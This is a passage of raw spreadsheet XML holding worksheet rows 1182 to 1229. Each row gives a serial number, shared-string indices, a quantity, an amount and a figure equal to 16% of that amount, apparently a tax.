        <v>833.61</v>
      </c>
      <c r="J1182" s="15">
        <v>133.4</v>
      </c>
      <c r="K1182" s="16"/>
    </row>
    <row r="1183" spans="2:11">
      <c r="B1183" s="9">
        <v>1217</v>
      </c>
      <c r="C1183" s="238" t="s">
        <v>7865</v>
      </c>
      <c r="D1183" s="238" t="s">
        <v>7866</v>
      </c>
      <c r="E1183" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F1183" s="238" t="s">
        <v>7867</v>
      </c>
      <c r="G1183" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1183" s="10">
        <v>12</v>
      </c>
      <c r="I1183" s="14">
        <v>680.06</v>
      </c>
      <c r="J1183" s="15">
        <v>108.8064</v>
      </c>
      <c r="K1183" s="16"/>
    </row>
    <row r="1184" spans="2:11">
      <c r="B1184" s="9">
        <v>1218</v>
      </c>
      <c r="C1184" s="238" t="s">
        <v>7868</v>
      </c>
      <c r="D1184" s="238" t="s">
        <v>7869</v>
      </c>
      <c r="E1184" s="238" t="s">
        <v>7870</v>
      </c>
      <c r="F1184" s="238" t="s">
        <v>7871</v>
      </c>
      <c r="G1184" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1184" s="10">
        <v>1</v>
      </c>
      <c r="I1184" s="14">
        <v>748.8</v>
      </c>
      <c r="J1184" s="15">
        <v>119.808</v>
      </c>
      <c r="K1184" s="16"/>
    </row>
    <row r="1185" spans="2:11">
      <c r="B1185" s="9">
        <v>1219</v>
      </c>
      <c r="C1185" s="238" t="s">
        <v>7872</v>
      </c>
      <c r="D1185" s="238" t="s">
        <v>7873</v>
      </c>
      <c r="E1185" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1185" s="238" t="s">
        <v>7874</v>
      </c>
      <c r="G1185" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1185" s="10">
        <v>1</v>
      </c>
      <c r="I1185" s="14">
        <v>204.78</v>
      </c>
      <c r="J1185" s="15">
        <v>32.7648</v>
      </c>
      <c r="K1185" s="16"/>
    </row>
    <row r="1186" spans="2:11">
      <c r="B1186" s="9">
        <v>1220</v>
      </c>
      <c r="C1186" s="238" t="s">
        <v>7875</v>
      </c>
      <c r="D1186" s="238" t="s">
        <v>7876</v>
      </c>
      <c r="E1186" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F1186" s="238" t="s">
        <v>7877</v>
      </c>
      <c r="G1186" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1186" s="10">
        <v>1</v>
      </c>
      <c r="I1186" s="14">
        <v>89.49</v>
      </c>
      <c r="J1186" s="15">
        <v>14.3184</v>
      </c>
      <c r="K1186" s="16"/>
    </row>
    <row r="1187" spans="2:11">
      <c r="B1187" s="9">
        <v>1221</v>
      </c>
      <c r="C1187" s="238" t="s">
        <v>7878</v>
      </c>
      <c r="D1187" s="238" t="s">
        <v>7879</v>
      </c>
      <c r="E1187" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F1187" s="238" t="s">
        <v>7880</v>
      </c>
      <c r="G1187" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1187" s="10">
        <v>13</v>
      </c>
      <c r="I1187" s="14">
        <v>77.58</v>
      </c>
      <c r="J1187" s="15">
        <v>12.4176</v>
      </c>
      <c r="K1187" s="16"/>
    </row>
    <row r="1188" spans="2:11">
      <c r="B1188" s="9">
        <v>1222</v>
      </c>
      <c r="C1188" s="238" t="s">
        <v>7881</v>
      </c>
      <c r="D1188" s="238" t="s">
        <v>7882</v>
      </c>
      <c r="E1188" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1188" s="238" t="s">
        <v>7883</v>
      </c>
      <c r="G1188" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1188" s="10">
        <v>23</v>
      </c>
      <c r="I1188" s="14">
        <v>723.46</v>
      </c>
      <c r="J1188" s="15">
        <v>115.736</v>
      </c>
      <c r="K1188" s="16"/>
    </row>
    <row r="1189" spans="2:11">
      <c r="B1189" s="9">
        <v>1223</v>
      </c>
      <c r="C1189" s="238" t="s">
        <v>7884</v>
      </c>
      <c r="D1189" s="238" t="s">
        <v>7885</v>
      </c>
      <c r="E1189" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1189" s="238" t="s">
        <v>7886</v>
      </c>
      <c r="G1189" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1189" s="10">
        <v>12</v>
      </c>
      <c r="I1189" s="14">
        <v>495.19</v>
      </c>
      <c r="J1189" s="15">
        <v>79.2384</v>
      </c>
      <c r="K1189" s="16"/>
    </row>
    <row r="1190" spans="2:11">
      <c r="B1190" s="9">
        <v>1224</v>
      </c>
      <c r="C1190" s="238" t="s">
        <v>7887</v>
      </c>
      <c r="D1190" s="238" t="s">
        <v>7888</v>
      </c>
      <c r="E1190" s="238" t="s">
        <v>7741</v>
      </c>
      <c r="F1190" s="238" t="s">
        <v>7889</v>
      </c>
      <c r="G1190" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1190" s="10">
        <v>1</v>
      </c>
      <c r="I1190" s="14">
        <v>61.12</v>
      </c>
      <c r="J1190" s="15">
        <v>9.7792</v>
      </c>
      <c r="K1190" s="16"/>
    </row>
    <row r="1191" spans="2:11">
      <c r="B1191" s="9">
        <v>1225</v>
      </c>
      <c r="C1191" s="238" t="s">
        <v>7890</v>
      </c>
      <c r="D1191" s="238" t="s">
        <v>7891</v>
      </c>
      <c r="E1191" s="238" t="s">
        <v>7892</v>
      </c>
      <c r="F1191" s="238" t="s">
        <v>7893</v>
      </c>
      <c r="G1191" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1191" s="10">
        <v>2</v>
      </c>
      <c r="I1191" s="14">
        <v>437.61</v>
      </c>
      <c r="J1191" s="15">
        <v>70.0192</v>
      </c>
      <c r="K1191" s="16"/>
    </row>
    <row r="1192" spans="2:11">
      <c r="B1192" s="9">
        <v>1226</v>
      </c>
      <c r="C1192" s="238" t="s">
        <v>7894</v>
      </c>
      <c r="D1192" s="238" t="s">
        <v>7895</v>
      </c>
      <c r="E1192" s="238" t="s">
        <v>7896</v>
      </c>
      <c r="F1192" s="238" t="s">
        <v>7897</v>
      </c>
      <c r="G1192" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1192" s="10">
        <v>1</v>
      </c>
      <c r="I1192" s="14">
        <v>4358.97</v>
      </c>
      <c r="J1192" s="15">
        <v>697.4352</v>
      </c>
      <c r="K1192" s="16"/>
    </row>
    <row r="1193" spans="2:11">
      <c r="B1193" s="9">
        <v>1227</v>
      </c>
      <c r="C1193" s="238" t="s">
        <v>7898</v>
      </c>
      <c r="D1193" s="238" t="s">
        <v>7899</v>
      </c>
      <c r="E1193" s="238" t="s">
        <v>7900</v>
      </c>
      <c r="F1193" s="238" t="s">
        <v>7901</v>
      </c>
      <c r="G1193" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1193" s="10">
        <v>1</v>
      </c>
      <c r="I1193" s="14">
        <v>128.8</v>
      </c>
      <c r="J1193" s="15">
        <v>20.608</v>
      </c>
      <c r="K1193" s="16"/>
    </row>
    <row r="1194" spans="2:11">
      <c r="B1194" s="9">
        <v>1228</v>
      </c>
      <c r="C1194" s="238" t="s">
        <v>7902</v>
      </c>
      <c r="D1194" s="238" t="s">
        <v>7903</v>
      </c>
      <c r="E1194" s="238" t="s">
        <v>5327</v>
      </c>
      <c r="F1194" s="238" t="s">
        <v>7904</v>
      </c>
      <c r="G1194" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1194" s="10">
        <v>1</v>
      </c>
      <c r="I1194" s="14">
        <v>8376.07</v>
      </c>
      <c r="J1194" s="15">
        <v>1340.1712</v>
      </c>
      <c r="K1194" s="16"/>
    </row>
    <row r="1195" spans="2:11">
      <c r="B1195" s="9">
        <v>1229</v>
      </c>
      <c r="C1195" s="238" t="s">
        <v>7905</v>
      </c>
      <c r="D1195" s="238" t="s">
        <v>7906</v>
      </c>
      <c r="E1195" s="238" t="s">
        <v>7907</v>
      </c>
      <c r="F1195" s="238" t="s">
        <v>7908</v>
      </c>
      <c r="G1195" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1195" s="10">
        <v>1</v>
      </c>
      <c r="I1195" s="14">
        <v>140.8</v>
      </c>
      <c r="J1195" s="15">
        <v>22.528</v>
      </c>
      <c r="K1195" s="16"/>
    </row>
    <row r="1196" spans="2:11">
      <c r="B1196" s="9">
        <v>1230</v>
      </c>
      <c r="C1196" s="238" t="s">
        <v>7909</v>
      </c>
      <c r="D1196" s="238" t="s">
        <v>7910</v>
      </c>
      <c r="E1196" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1196" s="238" t="s">
        <v>7911</v>
      </c>
      <c r="G1196" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1196" s="10">
        <v>20</v>
      </c>
      <c r="I1196" s="14">
        <v>73.72</v>
      </c>
      <c r="J1196" s="15">
        <v>11.808</v>
      </c>
      <c r="K1196" s="16"/>
    </row>
    <row r="1197" spans="2:11">
      <c r="B1197" s="9">
        <v>1231</v>
      </c>
      <c r="C1197" s="238" t="s">
        <v>7912</v>
      </c>
      <c r="D1197" s="238" t="s">
        <v>7913</v>
      </c>
      <c r="E1197" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F1197" s="238" t="s">
        <v>7914</v>
      </c>
      <c r="G1197" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1197" s="10">
        <v>60</v>
      </c>
      <c r="I1197" s="14">
        <v>1025.64</v>
      </c>
      <c r="J1197" s="15">
        <v>164.064</v>
      </c>
      <c r="K1197" s="16"/>
    </row>
    <row r="1198" spans="2:11">
      <c r="B1198" s="9">
        <v>1232</v>
      </c>
      <c r="C1198" s="238" t="s">
        <v>7915</v>
      </c>
      <c r="D1198" s="238" t="s">
        <v>7916</v>
      </c>
      <c r="E1198" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F1198" s="238" t="s">
        <v>7917</v>
      </c>
      <c r="G1198" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1198" s="10">
        <v>88</v>
      </c>
      <c r="I1198" s="14">
        <v>1979.23</v>
      </c>
      <c r="J1198" s="15">
        <v>316.6592</v>
      </c>
      <c r="K1198" s="16"/>
    </row>
    <row r="1199" spans="2:11">
      <c r="B1199" s="9">
        <v>1233</v>
      </c>
      <c r="C1199" s="238" t="s">
        <v>7918</v>
      </c>
      <c r="D1199" s="238" t="s">
        <v>7919</v>
      </c>
      <c r="E1199" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F1199" s="238" t="s">
        <v>7920</v>
      </c>
      <c r="G1199" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1199" s="10">
        <v>89</v>
      </c>
      <c r="I1199" s="14">
        <v>2252.13</v>
      </c>
      <c r="J1199" s="15">
        <v>360.272</v>
      </c>
      <c r="K1199" s="16"/>
    </row>
    <row r="1200" spans="2:11">
      <c r="B1200" s="9">
        <v>1234</v>
      </c>
      <c r="C1200" s="238" t="s">
        <v>7921</v>
      </c>
      <c r="D1200" s="238" t="s">
        <v>4765</v>
      </c>
      <c r="E1200" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F1200" s="238" t="s">
        <v>7922</v>
      </c>
      <c r="G1200" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1200" s="10">
        <v>8</v>
      </c>
      <c r="I1200" s="14">
        <v>95.72</v>
      </c>
      <c r="J1200" s="15">
        <v>15.3216</v>
      </c>
      <c r="K1200" s="16"/>
    </row>
    <row r="1201" spans="2:11">
      <c r="B1201" s="9">
        <v>1235</v>
      </c>
      <c r="C1201" s="238" t="s">
        <v>7923</v>
      </c>
      <c r="D1201" s="238" t="s">
        <v>7924</v>
      </c>
      <c r="E1201" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F1201" s="238" t="s">
        <v>7925</v>
      </c>
      <c r="G1201" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1201" s="10">
        <v>45</v>
      </c>
      <c r="I1201" s="14">
        <v>2215.39</v>
      </c>
      <c r="J1201" s="15">
        <v>354.456</v>
      </c>
      <c r="K1201" s="16"/>
    </row>
    <row r="1202" spans="2:11">
      <c r="B1202" s="9">
        <v>1236</v>
      </c>
      <c r="C1202" s="238" t="s">
        <v>7926</v>
      </c>
      <c r="D1202" s="238" t="s">
        <v>7927</v>
      </c>
      <c r="E1202" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F1202" s="238" t="s">
        <v>7639</v>
      </c>
      <c r="G1202" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1202" s="10">
        <v>5</v>
      </c>
      <c r="I1202" s="14">
        <v>655.44</v>
      </c>
      <c r="J1202" s="15">
        <v>104.872</v>
      </c>
      <c r="K1202" s="16"/>
    </row>
    <row r="1203" spans="2:11">
      <c r="B1203" s="9">
        <v>1237</v>
      </c>
      <c r="C1203" s="238" t="s">
        <v>7928</v>
      </c>
      <c r="D1203" s="238" t="s">
        <v>7929</v>
      </c>
      <c r="E1203" s="238" t="s">
        <v>7930</v>
      </c>
      <c r="F1203" s="238" t="s">
        <v>7931</v>
      </c>
      <c r="G1203" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1203" s="10">
        <v>2</v>
      </c>
      <c r="I1203" s="14">
        <v>615.51</v>
      </c>
      <c r="J1203" s="15">
        <v>98.4832</v>
      </c>
      <c r="K1203" s="16"/>
    </row>
    <row r="1204" spans="2:11">
      <c r="B1204" s="9">
        <v>1238</v>
      </c>
      <c r="C1204" s="238" t="s">
        <v>7932</v>
      </c>
      <c r="D1204" s="238" t="s">
        <v>7933</v>
      </c>
      <c r="E1204" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F1204" s="238" t="s">
        <v>7934</v>
      </c>
      <c r="G1204" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1204" s="10">
        <v>12</v>
      </c>
      <c r="I1204" s="14">
        <v>1312</v>
      </c>
      <c r="J1204" s="15">
        <v>209.9136</v>
      </c>
      <c r="K1204" s="16"/>
    </row>
    <row r="1205" spans="2:11">
      <c r="B1205" s="9">
        <v>1239</v>
      </c>
      <c r="C1205" s="238" t="s">
        <v>7935</v>
      </c>
      <c r="D1205" s="238" t="s">
        <v>7936</v>
      </c>
      <c r="E1205" s="238" t="s">
        <v>7741</v>
      </c>
      <c r="F1205" s="9"/>
      <c r="G1205" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1205" s="10">
        <v>1</v>
      </c>
      <c r="I1205" s="14">
        <v>126</v>
      </c>
      <c r="J1205" s="15">
        <v>20.16</v>
      </c>
      <c r="K1205" s="16"/>
    </row>
    <row r="1206" spans="2:11">
      <c r="B1206" s="9">
        <v>1240</v>
      </c>
      <c r="C1206" s="238" t="s">
        <v>7937</v>
      </c>
      <c r="D1206" s="238" t="s">
        <v>7938</v>
      </c>
      <c r="E1206" s="238" t="s">
        <v>7939</v>
      </c>
      <c r="F1206" s="9"/>
      <c r="G1206" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1206" s="10">
        <v>2</v>
      </c>
      <c r="I1206" s="14">
        <v>18810.4</v>
      </c>
      <c r="J1206" s="15">
        <v>3009.664</v>
      </c>
      <c r="K1206" s="16"/>
    </row>
    <row r="1207" spans="2:11">
      <c r="B1207" s="9">
        <v>1241</v>
      </c>
      <c r="C1207" s="238" t="s">
        <v>7940</v>
      </c>
      <c r="D1207" s="238" t="s">
        <v>7941</v>
      </c>
      <c r="E1207" s="238" t="s">
        <v>7942</v>
      </c>
      <c r="F1207" s="238" t="s">
        <v>7943</v>
      </c>
      <c r="G1207" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1207" s="10">
        <v>1</v>
      </c>
      <c r="I1207" s="14">
        <v>350.09</v>
      </c>
      <c r="J1207" s="15">
        <v>56.0144</v>
      </c>
      <c r="K1207" s="16"/>
    </row>
    <row r="1208" spans="2:11">
      <c r="B1208" s="9">
        <v>1242</v>
      </c>
      <c r="C1208" s="238" t="s">
        <v>7944</v>
      </c>
      <c r="D1208" s="238" t="s">
        <v>7945</v>
      </c>
      <c r="E1208" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1208" s="238" t="s">
        <v>7946</v>
      </c>
      <c r="G1208" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1208" s="10">
        <v>2000</v>
      </c>
      <c r="I1208" s="14">
        <v>2051.28</v>
      </c>
      <c r="J1208" s="15">
        <v>329.6</v>
      </c>
      <c r="K1208" s="16"/>
    </row>
    <row r="1209" spans="2:11">
      <c r="B1209" s="9">
        <v>1243</v>
      </c>
      <c r="C1209" s="238" t="s">
        <v>7947</v>
      </c>
      <c r="D1209" s="238" t="s">
        <v>7948</v>
      </c>
      <c r="E1209" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F1209" s="238" t="s">
        <v>7950</v>
      </c>
      <c r="G1209" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1209" s="10">
        <v>2</v>
      </c>
      <c r="I1209" s="14">
        <v>2647.57</v>
      </c>
      <c r="J1209" s="15">
        <v>423.6128</v>
      </c>
      <c r="K1209" s="16"/>
    </row>
    <row r="1210" spans="2:11">
      <c r="B1210" s="9">
        <v>1244</v>
      </c>
      <c r="C1210" s="238" t="s">
        <v>7951</v>
      </c>
      <c r="D1210" s="238" t="s">
        <v>7952</v>
      </c>
      <c r="E1210" s="238" t="s">
        <v>7953</v>
      </c>
      <c r="F1210" s="238" t="s">
        <v>7954</v>
      </c>
      <c r="G1210" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1210" s="10">
        <v>5</v>
      </c>
      <c r="I1210" s="14">
        <v>438.52</v>
      </c>
      <c r="J1210" s="15">
        <v>70.16</v>
      </c>
      <c r="K1210" s="16"/>
    </row>
    <row r="1211" spans="2:11">
      <c r="B1211" s="9">
        <v>1245</v>
      </c>
      <c r="C1211" s="238" t="s">
        <v>7955</v>
      </c>
      <c r="D1211" s="238" t="s">
        <v>7956</v>
      </c>
      <c r="E1211" s="238" t="s">
        <v>7957</v>
      </c>
      <c r="F1211" s="238" t="s">
        <v>7958</v>
      </c>
      <c r="G1211" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1211" s="10">
        <v>5</v>
      </c>
      <c r="I1211" s="14">
        <v>443.95</v>
      </c>
      <c r="J1211" s="15">
        <v>71.032</v>
      </c>
      <c r="K1211" s="16"/>
    </row>
    <row r="1212" spans="2:11">
      <c r="B1212" s="9">
        <v>1246</v>
      </c>
      <c r="C1212" s="238" t="s">
        <v>7959</v>
      </c>
      <c r="D1212" s="238" t="s">
        <v>7960</v>
      </c>
      <c r="E1212" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F1212" s="238" t="s">
        <v>6983</v>
      </c>
      <c r="G1212" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1212" s="10">
        <v>7</v>
      </c>
      <c r="I1212" s="14">
        <v>70</v>
      </c>
      <c r="J1212" s="15">
        <v>11.2</v>
      </c>
      <c r="K1212" s="16"/>
    </row>
    <row r="1213" spans="2:11">
      <c r="B1213" s="9">
        <v>1247</v>
      </c>
      <c r="C1213" s="238" t="s">
        <v>7961</v>
      </c>
      <c r="D1213" s="238" t="s">
        <v>7962</v>
      </c>
      <c r="E1213" s="238" t="s">
        <v>7734</v>
      </c>
      <c r="F1213" s="238" t="s">
        <v>7877</v>
      </c>
      <c r="G1213" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1213" s="10">
        <v>15</v>
      </c>
      <c r="I1213" s="14">
        <v>243.61</v>
      </c>
      <c r="J1213" s="15">
        <v>38.976</v>
      </c>
      <c r="K1213" s="16"/>
    </row>
    <row r="1214" spans="2:11">
      <c r="B1214" s="9">
        <v>1248</v>
      </c>
      <c r="C1214" s="238" t="s">
        <v>7963</v>
      </c>
      <c r="D1214" s="238" t="s">
        <v>7964</v>
      </c>
      <c r="E1214" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F1214" s="238" t="s">
        <v>7965</v>
      </c>
      <c r="G1214" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1214" s="10">
        <v>58</v>
      </c>
      <c r="I1214" s="14">
        <v>4322.73</v>
      </c>
      <c r="J1214" s="15">
        <v>691.6384</v>
      </c>
      <c r="K1214" s="16"/>
    </row>
    <row r="1215" spans="2:11">
      <c r="B1215" s="9">
        <v>1249</v>
      </c>
      <c r="C1215" s="238" t="s">
        <v>7966</v>
      </c>
      <c r="D1215" s="238" t="s">
        <v>7967</v>
      </c>
      <c r="E1215" s="238" t="s">
        <v>7968</v>
      </c>
      <c r="F1215" s="238" t="s">
        <v>7969</v>
      </c>
      <c r="G1215" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1215" s="10">
        <v>29</v>
      </c>
      <c r="I1215" s="14">
        <v>143.5</v>
      </c>
      <c r="J1215" s="15">
        <v>22.968</v>
      </c>
      <c r="K1215" s="16"/>
    </row>
    <row r="1216" spans="2:11">
      <c r="B1216" s="9">
        <v>1250</v>
      </c>
      <c r="C1216" s="238" t="s">
        <v>7970</v>
      </c>
      <c r="D1216" s="238" t="s">
        <v>7971</v>
      </c>
      <c r="E1216" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1216" s="238" t="s">
        <v>7973</v>
      </c>
      <c r="G1216" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1216" s="10">
        <v>1</v>
      </c>
      <c r="I1216" s="14">
        <v>303.68</v>
      </c>
      <c r="J1216" s="15">
        <v>48.5888</v>
      </c>
      <c r="K1216" s="16"/>
    </row>
    <row r="1217" spans="2:11">
      <c r="B1217" s="9">
        <v>1251</v>
      </c>
      <c r="C1217" s="238" t="s">
        <v>7974</v>
      </c>
      <c r="D1217" s="238" t="s">
        <v>7975</v>
      </c>
      <c r="E1217" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1217" s="238" t="s">
        <v>7976</v>
      </c>
      <c r="G1217" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1217" s="10">
        <v>1</v>
      </c>
      <c r="I1217" s="14">
        <v>442.8</v>
      </c>
      <c r="J1217" s="15">
        <v>70.848</v>
      </c>
      <c r="K1217" s="16"/>
    </row>
    <row r="1218" spans="2:11">
      <c r="B1218" s="9">
        <v>1252</v>
      </c>
      <c r="C1218" s="238" t="s">
        <v>7977</v>
      </c>
      <c r="D1218" s="238" t="s">
        <v>7978</v>
      </c>
      <c r="E1218" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1218" s="238" t="s">
        <v>7979</v>
      </c>
      <c r="G1218" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1218" s="10">
        <v>3</v>
      </c>
      <c r="I1218" s="14">
        <v>792.8</v>
      </c>
      <c r="J1218" s="15">
        <v>126.8496</v>
      </c>
      <c r="K1218" s="16"/>
    </row>
    <row r="1219" spans="2:11">
      <c r="B1219" s="9">
        <v>1253</v>
      </c>
      <c r="C1219" s="238" t="s">
        <v>7980</v>
      </c>
      <c r="D1219" s="238" t="s">
        <v>7981</v>
      </c>
      <c r="E1219" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F1219" s="238" t="s">
        <v>7982</v>
      </c>
      <c r="G1219" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1219" s="10">
        <v>1</v>
      </c>
      <c r="I1219" s="14">
        <v>354.24</v>
      </c>
      <c r="J1219" s="15">
        <v>56.6784</v>
      </c>
      <c r="K1219" s="16"/>
    </row>
    <row r="1220" spans="2:11">
      <c r="B1220" s="9">
        <v>1254</v>
      </c>
      <c r="C1220" s="238" t="s">
        <v>7983</v>
      </c>
      <c r="D1220" s="238" t="s">
        <v>7984</v>
      </c>
      <c r="E1220" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1220" s="238" t="s">
        <v>7985</v>
      </c>
      <c r="G1220" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1220" s="10">
        <v>1</v>
      </c>
      <c r="I1220" s="14">
        <v>500</v>
      </c>
      <c r="J1220" s="15">
        <v>80</v>
      </c>
      <c r="K1220" s="16"/>
    </row>
    <row r="1221" spans="2:11">
      <c r="B1221" s="9">
        <v>1255</v>
      </c>
      <c r="C1221" s="238" t="s">
        <v>7986</v>
      </c>
      <c r="D1221" s="238" t="s">
        <v>7987</v>
      </c>
      <c r="E1221" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F1221" s="238" t="s">
        <v>7988</v>
      </c>
      <c r="G1221" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1221" s="10">
        <v>5</v>
      </c>
      <c r="I1221" s="14">
        <v>1500</v>
      </c>
      <c r="J1221" s="15">
        <v>240</v>
      </c>
      <c r="K1221" s="16"/>
    </row>
    <row r="1222" spans="2:11">
      <c r="B1222" s="9">
        <v>1256</v>
      </c>
      <c r="C1222" s="238" t="s">
        <v>7989</v>
      </c>
      <c r="D1222" s="238" t="s">
        <v>7990</v>
      </c>
      <c r="E1222" s="238" t="s">
        <v>7991</v>
      </c>
      <c r="F1222" s="238" t="s">
        <v>7992</v>
      </c>
      <c r="G1222" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1222" s="10">
        <v>1</v>
      </c>
      <c r="I1222" s="14">
        <v>136.75</v>
      </c>
      <c r="J1222" s="15">
        <v>21.88</v>
      </c>
      <c r="K1222" s="16"/>
    </row>
    <row r="1223" spans="2:11">
      <c r="B1223" s="9">
        <v>1257</v>
      </c>
      <c r="C1223" s="238" t="s">
        <v>7993</v>
      </c>
      <c r="D1223" s="238" t="s">
        <v>7994</v>
      </c>
      <c r="E1223" s="238" t="s">
        <v>7995</v>
      </c>
      <c r="F1223" s="238" t="s">
        <v>7996</v>
      </c>
      <c r="G1223" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1223" s="10">
        <v>1</v>
      </c>
      <c r="I1223" s="14">
        <v>4205.14</v>
      </c>
      <c r="J1223" s="15">
        <v>672.8224</v>
      </c>
      <c r="K1223" s="16"/>
    </row>
    <row r="1224" spans="2:11">
      <c r="B1224" s="9">
        <v>1258</v>
      </c>
      <c r="C1224" s="238" t="s">
        <v>7997</v>
      </c>
      <c r="D1224" s="238" t="s">
        <v>7998</v>
      </c>
      <c r="E1224" s="238" t="s">
        <v>7752</v>
      </c>
      <c r="F1224" s="238" t="s">
        <v>7999</v>
      </c>
      <c r="G1224" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1224" s="10">
        <v>42</v>
      </c>
      <c r="I1224" s="14">
        <v>2450.51</v>
      </c>
      <c r="J1224" s="15">
        <v>392.112</v>
      </c>
      <c r="K1224" s="16"/>
    </row>
    <row r="1225" spans="2:11">
      <c r="B1225" s="9">
        <v>1259</v>
      </c>
      <c r="C1225" s="238" t="s">
        <v>8000</v>
      </c>
      <c r="D1225" s="238" t="s">
        <v>8001</v>
      </c>
      <c r="E1225" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F1225" s="238" t="s">
        <v>7854</v>
      </c>
      <c r="G1225" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1225" s="10">
        <v>1</v>
      </c>
      <c r="I1225" s="14">
        <v>194</v>
      </c>
      <c r="J1225" s="15">
        <v>31.04</v>
      </c>
      <c r="K1225" s="16"/>
    </row>
    <row r="1226" spans="2:11">
      <c r="B1226" s="9">
        <v>1260</v>
      </c>
      <c r="C1226" s="238" t="s">
        <v>8002</v>
      </c>
      <c r="D1226" s="238" t="s">
        <v>8003</v>
      </c>
      <c r="E1226" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1226" s="238" t="s">
        <v>8004</v>
      </c>
      <c r="G1226" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1226" s="10">
        <v>18</v>
      </c>
      <c r="I1226" s="14">
        <v>49.23</v>
      </c>
      <c r="J1226" s="15">
        <v>7.8912</v>
      </c>
      <c r="K1226" s="16"/>
    </row>
    <row r="1227" spans="2:11">
      <c r="B1227" s="9">
        <v>1261</v>
      </c>
      <c r="C1227" s="238" t="s">
        <v>8005</v>
      </c>
      <c r="D1227" s="238" t="s">
        <v>8006</v>
      </c>
      <c r="E1227" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1227" s="238" t="s">
        <v>8007</v>
      </c>
      <c r="G1227" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1227" s="10">
        <v>99</v>
      </c>
      <c r="I1227" s="14">
        <v>373.63</v>
      </c>
      <c r="J1227" s="15">
        <v>59.7168</v>
      </c>
      <c r="K1227" s="16"/>
    </row>
    <row r="1228" spans="2:11">
      <c r="B1228" s="9">
        <v>1262</v>
      </c>
      <c r="C1228" s="238" t="s">
        <v>8008</v>
      </c>
      <c r="D1228" s="238" t="s">
        <v>8009</v>
      </c>
      <c r="E1228" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F1228" s="238" t="s">
        <v>8010</v>
      </c>
      <c r="G1228" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1228" s="10">
        <v>6</v>
      </c>
      <c r="I1228" s="14">
        <v>784</v>
      </c>
      <c r="J1228" s="15">
        <v>125.4432</v>
      </c>
      <c r="K1228" s="16"/>
    </row>
    <row r="1229" spans="2:11">
      <c r="B1229" s="9">
        <v>1263</v>
      </c>
      <c r="C1229" s="238" t="s">
        <v>8011</v>
      </c>
      <c r="D1229" s="238" t="s">
        <v>8012</v>
      </c>
      <c r="E1229" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1229" s="238" t="s">
        <v>8013</v>
      </c>
      <c r="G1229" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1229" s="10">
        <v>1</v>
      </c>
      <c r="I1229" s="14">
        <v>186.52</v>
      </c>
      <c r="J1229" s="15">
        <v>29.8432</v>
      </c>
      <c r="K1229" s="16"/>
